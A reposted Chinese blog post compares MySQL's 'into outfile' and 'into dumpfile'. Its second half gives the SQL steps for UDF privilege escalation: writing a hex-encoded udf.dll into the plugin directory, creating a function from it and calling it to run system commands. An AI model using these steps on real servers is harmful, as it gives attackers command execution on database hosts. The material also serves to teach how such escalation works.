共計(jì) 1513 個字符，預(yù)計(jì)需要花費(fèi) 4 分鐘才能閱讀完成。

這篇文章將為大家詳細(xì)講解有關(guān) mysql 中 dumpfile 與 outfile 函數(shù)的區(qū)別是什么，文章內(nèi)容質(zhì)量較高，因此丸趣 TV 小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

 
如下表 admin
 
mysql select * from admin;
 
+—–+———–+———+
 
| uid | name  | pass  |
 
+—-+————+———+
 
|  1 | admin  | baidusb | 
 
|  2 | root  | hacksb  |
|  3 | manage  | nimei  |
 
|  4 | boss  | helensb |
 
|  5 | guanli  | admin  |
 
|  6 | superuser  | G0Ood  |
 
+—-+————+———+
 
mysql select * from admin into outfile /home/seclab/test/test1.txt
 
Query OK,1 row affected (0.00 sec)
 
我是想將這些內(nèi)容 導(dǎo)出到 一個 txt 文件, 事實(shí)上是可以完整導(dǎo)出每行記錄的.
這個很適合導(dǎo)庫
 
 
而 into dump 是不行的 它只能導(dǎo)出 一行數(shù)據(jù)!
 
 
若我們想把一個 可執(zhí)行 2 進(jìn)制 文件用 into outfile 函數(shù)導(dǎo)出
事實(shí)上 導(dǎo)出后 就會被破壞
 
因?yàn)?into outfile 函數(shù) 會 在行末端寫入新行 更致命的 是會轉(zhuǎn)義 換行符
這樣的話這個 2 進(jìn)制可執(zhí)行 文件 就會被破壞
 
這時候我們用 into dumpfile 就能導(dǎo)出 一個完整能執(zhí)行的 2 進(jìn)制 文件
into dumpfile 函數(shù)不對任何列或行進(jìn)行終止，也不執(zhí)行任何轉(zhuǎn)義處理
 
 
如在無 web 腳本 執(zhí)行 但是有 mysql root 執(zhí)行的環(huán)境下 我們就可以 通過
into dump 函數(shù)導(dǎo)入 udf.dll 進(jìn)行提權(quán)
 
mysql show variable like %plugin%
 
+—————-+——————————————+
|Variable_name  | Value  |
+—————-+——————————————+
| plugin_dir  |c:\mysql\mysql server 5.1\lib/plugin  |
+—————-+——————————————+
 
mysql select unhex(udf.dll hex code) into dumpfile c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll
mysql select * from func; #查看是否有人創(chuàng)建過 udf 如果有就可以省略
mysql create function MyCmd returns string soname c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll
mysql select MyCmd(whoam
 
一點(diǎn)小知識點(diǎn):
 
如何獲取該 udf.dll 文件的 16 進(jìn)制值 (hex)?
我們可以本地搭建 mysql 環(huán)境 找個可以用的 udf.dll 文件 執(zhí)行下面操作
 
mysql select hex(load_file ( c://temp/xxoo.dll)) into outfile c:/windows/temp/xxoo.txt

關(guān)于 mysql 中 dumpfile 與 outfile 函數(shù)的區(qū)別是什么就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學(xué)到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。